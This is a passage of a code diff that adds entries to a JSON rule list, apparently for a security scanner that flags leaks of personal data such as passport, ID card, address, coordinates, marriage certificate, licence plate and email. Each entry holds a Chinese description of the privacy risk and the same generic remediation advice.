"\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_name": "\u62a4\u7167\u6cc4\u9732", + "vul_name_en": null, + "vul_name_zh": "\u62a4\u7167\u6cc4\u9732", + "vul_type": "\u62a4\u7167\u6cc4\u9732" + }, + { + "level": 1, + "state": "enable", + "system_type": 1, + "user": 1, + "vul_desc": "\u5bb6\u5ead\u5730\u5740\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u5bb6\u5ead\u7684\u4f4f\u5740\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u4f4f\u6237\u7684\u9690\u79c1\u53d7\u5230\u4fb5\u72af\u548c\u5b89\u5168\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u4e0d\u6cd5\u5206\u5b50\u6216\u6076\u610f\u4e2a\u4f53\u6ee5\u7528\uff0c\u7528\u4e8e\u5b9e\u65bd\u5165\u5ba4\u76d7\u7a83\u3001\u9a9a\u6270\u3001\u7f51\u7edc\u6b3a\u8bc8\u6216\u5176\u4ed6\u4e0d\u5f53\u884c\u4e3a\uff0c\u5bf9\u4f4f\u6237\u7684\u5b89\u5168\u548c\u9690\u79c1\u6784\u6210\u6f5c\u5728\u5a01\u80c1\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4\u5bb6\u5ead\u5730\u5740\u7684\u9690\u79c1\u81f3\u5173\u91cd\u8981\uff0c\u4ee5\u786e\u4fdd\u5bb6\u5ead\u6210\u5458\u7684\u5b89\u5168\u548c\u5b89\u5b81\u3002", + "vul_desc_en": null, + "vul_desc_zh": "\u5bb6\u5ead\u5730\u5740\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u5bb6\u5ead\u7684\u4f4f\u5740\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u4f4f\u6237\u7684\u9690\u79c1\u53d7\u5230\u4fb5\u72af\u548c\u5b89\u5168\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u4e0d\u6cd5\u5206\u5b50\u6216\u6076\u610f\u4e2a\u4f53\u6ee5\u7528\uff0c\u7528\u4e8e\u5b9e\u65bd\u5165\u5ba4\u76d7\u7a83\u3001\u9a9a\u6270\u3001\u7f51\u7edc\u6b3a\u8bc8\u6216\u5176\u4ed6\u4e0d\u5f53\u884c\u4e3a\uff0c\u5bf9\u4f4f\u6237\u7684\u5b89\u5168\u548c\u9690\u79c1\u6784\u6210\u6f5c\u5728\u5a01\u80c1\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4\u5bb6\u5ead\u5730\u5740\u7684\u9690\u79c1\u81f3\u5173\u91cd\u8981\uff0c\u4ee5\u786e\u4fdd\u5bb6\u5ead\u6210\u5458\u7684\u5b89\u5168\u548c\u5b89\u5b81\u3002", + "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_fix_en": null, + "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_name": "\u7528\u6237\u5730\u5740\u6cc4\u9732", + "vul_name_en": null, + "vul_name_zh": "\u7528\u6237\u5730\u5740\u6cc4\u9732", + "vul_type": "\u7528\u6237\u5730\u5740\u6cc4\u9732" + }, { "level": 5, "state": "enable", @@ -575,6 +703,38 @@ "vul_name_zh": "\u786c\u7f16\u7801", "vul_type": "\u786c\u7f16\u7801" }, + { + "level": 5, + "state": "enable", + "system_type": 1, + "user": 1, + "vul_desc": "\u7ecf\u7eac\u5ea6\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u5730\u70b9\u7684\u7cbe\u786e\u5730\u7406\u4f4d\u7f6e\u5750\u6807\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u9690\u79c1\u66b4\u9732\u3001\u4e2a\u4eba\u5b89\u5168\u53d7\u5a01\u80c1\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u6ee5\u7528\u6765\u8ddf\u8e2a\u4e2a\u4eba\u7684\u884c\u52a8\u3001\u66b4\u9732\u4f4f\u6240\u6216\u5de5\u4f5c\u5730\u70b9\u7b49\u654f\u611f\u4fe1\u606f\uff0c\u5bf9\u4e2a\u4eba\u5b89\u5168\u548c\u9690\u79c1\u6784\u6210\u6f5c\u5728\u98ce\u9669\u3002", + "vul_desc_en": null, + "vul_desc_zh": "\u7ecf\u7eac\u5ea6\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u5730\u70b9\u7684\u7cbe\u786e\u5730\u7406\u4f4d\u7f6e\u5750\u6807\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u9690\u79c1\u66b4\u9732\u3001\u4e2a\u4eba\u5b89\u5168\u53d7\u5a01\u80c1\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u6ee5\u7528\u6765\u8ddf\u8e2a\u4e2a\u4eba\u7684\u884c\u52a8\u3001\u66b4\u9732\u4f4f\u6240\u6216\u5de5\u4f5c\u5730\u70b9\u7b49\u654f\u611f\u4fe1\u606f\uff0c\u5bf9\u4e2a\u4eba\u5b89\u5168\u548c\u9690\u79c1\u6784\u6210\u6f5c\u5728\u98ce\u9669\u3002", + "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_fix_en": null, + "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_name": "\u7ecf\u7eac\u5ea6\u4fe1\u606f\u6cc4\u9732", + "vul_name_en": null, + "vul_name_zh": "\u7ecf\u7eac\u5ea6\u4fe1\u606f\u6cc4\u9732", + "vul_type": "\u7ecf\u7eac\u5ea6\u4fe1\u606f\u6cc4\u9732" + }, + { + "level": 2, + "state": "enable", + "system_type": 1, + "user": 1, + "vul_desc": "\u7ed3\u5a5a\u8bc1\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u7ed3\u5a5a\u8bc1\u4e0a\u5305\u542b\u7684\u654f\u611f\u4e2a\u4eba\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u4ece\u800c\u53ef\u80fd\u5bfc\u81f4\u9690\u79c1\u4fb5\u72af\uff0c\u8eab\u4efd\u76d7\u7a83\uff0c\u793e\u4ea4\u5de5\u7a0b\u653b\u51fb\u7b49\uff0c\u56e0\u6b64\uff0c\u7ed3\u5a5a\u8bc1\u4fe1\u606f\u7684\u6cc4\u9732\u53ef\u80fd\u5bf9\u4e2a\u4eba\u7684\u9690\u79c1\u3001\u91d1\u878d\u5b89\u5168\u548c\u5a5a\u59fb\u5173\u7cfb\u6784\u6210\u4e25\u91cd\u5a01\u80c1\uff0c\u9700\u8981\u91c7\u53d6\u4e25\u683c\u7684\u5b89\u5168\u63aa\u65bd\u6765\u9632\u6b62\u6cc4\u9732\u548c\u6ee5\u7528\u3002\u540c\u65f6\uff0c\u6cd5\u5f8b\u548c\u6cd5\u89c4\u4e5f\u5e94\u5f53\u5236\u5b9a\u4ee5\u4fdd\u62a4\u4e2a\u4eba\u7684\u7ed3\u5a5a\u8bc1\u4fe1\u606f\u514d\u53d7\u4e0d\u5f53\u8bbf\u95ee\u548c\u6ee5\u7528\u3002", + "vul_desc_en": null, + "vul_desc_zh": "\u7ed3\u5a5a\u8bc1\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u7ed3\u5a5a\u8bc1\u4e0a\u5305\u542b\u7684\u654f\u611f\u4e2a\u4eba\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u4ece\u800c\u53ef\u80fd\u5bfc\u81f4\u9690\u79c1\u4fb5\u72af\uff0c\u8eab\u4efd\u76d7\u7a83\uff0c\u793e\u4ea4\u5de5\u7a0b\u653b\u51fb\u7b49\uff0c\u56e0\u6b64\uff0c\u7ed3\u5a5a\u8bc1\u4fe1\u606f\u7684\u6cc4\u9732\u53ef\u80fd\u5bf9\u4e2a\u4eba\u7684\u9690\u79c1\u3001\u91d1\u878d\u5b89\u5168\u548c\u5a5a\u59fb\u5173\u7cfb\u6784\u6210\u4e25\u91cd\u5a01\u80c1\uff0c\u9700\u8981\u91c7\u53d6\u4e25\u683c\u7684\u5b89\u5168\u63aa\u65bd\u6765\u9632\u6b62\u6cc4\u9732\u548c\u6ee5\u7528\u3002\u540c\u65f6\uff0c\u6cd5\u5f8b\u548c\u6cd5\u89c4\u4e5f\u5e94\u5f53\u5236\u5b9a\u4ee5\u4fdd\u62a4\u4e2a\u4eba\u7684\u7ed3\u5a5a\u8bc1\u4fe1\u606f\u514d\u53d7\u4e0d\u5f53\u8bbf\u95ee\u548c\u6ee5\u7528\u3002", + "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_fix_en": null, + "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_name": "\u7ed3\u5a5a\u8bc1\u6cc4\u9732", + "vul_name_en": null, + "vul_name_zh": "\u7ed3\u5a5a\u8bc1\u6cc4\u9732", + "vul_type": "\u7ed3\u5a5a\u8bc1\u6cc4\u9732" + }, { "level": 1, "state": "enable", @@ -590,5 +750,53 @@ "vul_name_en": null, "vul_name_zh": "\u8eab\u4efd\u8ba4\u8bc1", "vul_type": "\u8eab\u4efd\u8ba4\u8bc1" + }, + { + "level": 1, + "state": "enable", + "system_type": 1, + "user": 1, + "vul_desc": "\u8eab\u4efd\u8bc1\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684\u8eab\u4efd\u8bc1\u53f7\u7801\u53ca\u76f8\u5173\u654f\u611f\u4e2a\u4eba\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u4ece\u800c\u5bfc\u81f4\u4e2a\u4eba\u9690\u79c1\u66b4\u9732\u7684\u4e00\u79cd\u4e25\u91cd\u6f0f\u6d1e\u3002\n\u4e00\u65e6\u8eab\u4efd\u8bc1\u4fe1\u606f\u88ab\u6cc4\u9732\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u6ee5\u7528\u8fd9\u4e9b\u4fe1\u606f\u8fdb\u884c\u5404\u79cd\u6076\u610f\u6d3b\u52a8\uff0c\u5305\u62ec\u8eab\u4efd\u76d7\u7a83\u3001\u6b3a\u8bc8\u3001\u865a\u5047\u8eab\u4efd\u5236\u4f5c\u7b49\u3002\u4f8b\u5982\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528\u88ab\u6cc4\u9732\u7684\u8eab\u4efd\u8bc1\u4fe1\u606f\u6765\u5192\u5145\u53d7\u5bb3\u8005\uff0c\u8fdb\u884c\u91d1\u878d\u8bc8\u9a97\u6216\u975e\u6cd5\u8bbf\u95ee\u53d7\u5bb3\u8005\u7684\u4e2a\u4eba\u8d26\u6237\u3002\u6b64\u5916\uff0c\u8fd9\u4e9b\u4fe1\u606f\u8fd8\u53ef\u4ee5\u88ab\u7528\u4e8e\u975e\u6cd5\u8d2d\u4e70\u5546\u54c1\u6216\u670d\u52a1\uff0c\u4ece\u800c\u7ed9\u53d7\u5bb3\u8005\u5e26\u6765\u8d22\u52a1\u635f\u5931\u548c\u6cd5\u5f8b\u95ee\u9898\u3002", + "vul_desc_en": null, + "vul_desc_zh": "\u8eab\u4efd\u8bc1\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684\u8eab\u4efd\u8bc1\u53f7\u7801\u53ca\u76f8\u5173\u654f\u611f\u4e2a\u4eba\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u4ece\u800c\u5bfc\u81f4\u4e2a\u4eba\u9690\u79c1\u66b4\u9732\u7684\u4e00\u79cd\u4e25\u91cd\u6f0f\u6d1e\u3002\n\u4e00\u65e6\u8eab\u4efd\u8bc1\u4fe1\u606f\u88ab\u6cc4\u9732\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u6ee5\u7528\u8fd9\u4e9b\u4fe1\u606f\u8fdb\u884c\u5404\u79cd\u6076\u610f\u6d3b\u52a8\uff0c\u5305\u62ec\u8eab\u4efd\u76d7\u7a83\u3001\u6b3a\u8bc8\u3001\u865a\u5047\u8eab\u4efd\u5236\u4f5c\u7b49\u3002\u4f8b\u5982\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528\u88ab\u6cc4\u9732\u7684\u8eab\u4efd\u8bc1\u4fe1\u606f\u6765\u5192\u5145\u53d7\u5bb3\u8005\uff0c\u8fdb\u884c\u91d1\u878d\u8bc8\u9a97\u6216\u975e\u6cd5\u8bbf\u95ee\u53d7\u5bb3\u8005\u7684\u4e2a\u4eba\u8d26\u6237\u3002\u6b64\u5916\uff0c\u8fd9\u4e9b\u4fe1\u606f\u8fd8\u53ef\u4ee5\u88ab\u7528\u4e8e\u975e\u6cd5\u8d2d\u4e70\u5546\u54c1\u6216\u670d\u52a1\uff0c\u4ece\u800c\u7ed9\u53d7\u5bb3\u8005\u5e26\u6765\u8d22\u52a1\u635f\u5931\u548c\u6cd5\u5f8b\u95ee\u9898\u3002", + "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_fix_en": null, + "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_name": "\u8eab\u4efd\u8bc1\u6cc4\u9732", + "vul_name_en": null, + "vul_name_zh": "\u8eab\u4efd\u8bc1\u6cc4\u9732", + "vul_type": "\u8eab\u4efd\u8bc1\u6cc4\u9732" + }, + { + "level": 5, + "state": "enable", + "system_type": 1, + "user": 1, + "vul_desc": "\u8f66\u724c\u53f7\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u8f66\u8f86\u6240\u6709\u8005\u7684\u8f66\u724c\u53f7\u7801\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u4e2a\u4eba\u9690\u79c1\u66b4\u9732\u3001\u8f66\u8f86\u88ab\u76d7\u7528\u6216\u6ee5\u7528\u7b49\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u7528\u4e8e\u8ffd\u8e2a\u4e2a\u4eba\u7684\u884c\u52a8\u3001\u5b9e\u65bd\u72af\u7f6a\u6d3b\u52a8\u6216\u8005\u5176\u4ed6\u4e0d\u5f53\u7528\u9014\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4\u8f66\u724c\u53f7\u7684\u9690\u79c1\u5bf9\u4e8e\u8f66\u4e3b\u7684\u5b89\u5168\u548c\u9690\u79c1\u81f3\u5173\u91cd\u8981\u3002", + "vul_desc_en": null, + "vul_desc_zh": "\u8f66\u724c\u53f7\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u8f66\u8f86\u6240\u6709\u8005\u7684\u8f66\u724c\u53f7\u7801\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u4e2a\u4eba\u9690\u79c1\u66b4\u9732\u3001\u8f66\u8f86\u88ab\u76d7\u7528\u6216\u6ee5\u7528\u7b49\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u7528\u4e8e\u8ffd\u8e2a\u4e2a\u4eba\u7684\u884c\u52a8\u3001\u5b9e\u65bd\u72af\u7f6a\u6d3b\u52a8\u6216\u8005\u5176\u4ed6\u4e0d\u5f53\u7528\u9014\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4\u8f66\u724c\u53f7\u7684\u9690\u79c1\u5bf9\u4e8e\u8f66\u4e3b\u7684\u5b89\u5168\u548c\u9690\u79c1\u81f3\u5173\u91cd\u8981\u3002", + "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_fix_en": null, + "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_name": "\u8f66\u724c\u53f7\u6cc4\u9732", + "vul_name_en": null, + "vul_name_zh": "\u8f66\u724c\u53f7\u6cc4\u9732", + "vul_type": "\u8f66\u724c\u53f7\u6cc4\u9732" + }, + { + "level": 5, + "state": "enable", + "system_type": 1, + "user": 1, + "vul_desc": "\u90ae\u7bb1\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684\u7535\u5b50\u90ae\u4ef6\u5730\u5740\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u5783\u573e\u90ae\u4ef6\u3001\u7f51\u7edc\u9493\u9c7c\u653b\u51fb\u3001\u8eab\u4efd\u76d7\u7a83\u7b49\u7535\u5b50\u90ae\u4ef6\u76f8\u5173\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u6ee5\u7528\u6765\u53d1\u9001\u6076\u610f\u90ae\u4ef6\u3001\u6b3a\u8bc8\u4fe1\u606f\u6216\u7528\u4e8e\u4e0d\u6cd5\u7528\u9014\uff0c\u5bf9\u7535\u5b50\u90ae\u4ef6\u7528\u6237\u7684\u9690\u79c1\u548c\u5b89\u5168\u6784\u6210\u6f5c\u5728\u5a01\u80c1\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4\u7535\u5b50\u90ae\u4ef6\u5730\u5740\u7684\u9690\u79c1\u5bf9\u4e8e\u9632\u8303\u7535\u5b50\u90ae\u4ef6\u76f8\u5173\u98ce\u9669\u81f3\u5173\u91cd\u8981\u3002", + "vul_desc_en": null, + "vul_desc_zh": "\u90ae\u7bb1\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684\u7535\u5b50\u90ae\u4ef6\u5730\u5740\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u5783\u573e\u90ae\u4ef6\u3001\u7f51\u7edc\u9493\u9c7c\u653b\u51fb\u3001\u8eab\u4efd\u76d7\u7a83\u7b49\u7535\u5b50\u90ae\u4ef6\u76f8\u5173\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u6ee5\u7528\u6765\u53d1\u9001\u6076\u610f\u90ae\u4ef6\u3001\u6b3a\u8bc8\u4fe1\u606f\u6216\u7528\u4e8e\u4e0d\u6cd5\u7528\u9014\uff0c\u5bf9\u7535\u5b50\u90ae\u4ef6\u7528\u6237\u7684\u9690\u79c1\u548c\u5b89\u5168\u6784\u6210\u6f5c\u5728\u5a01\u80c1\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4\u7535\u5b50\u90ae\u4ef6\u5730\u5740\u7684\u9690\u79c1\u5bf9\u4e8e\u9632\u8303\u7535\u5b50\u90ae\u4ef6\u76f8\u5173\u98ce\u9669\u81f3\u5173\u91cd\u8981\u3002", + "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_fix_en": null, + "vul_fix_zh": 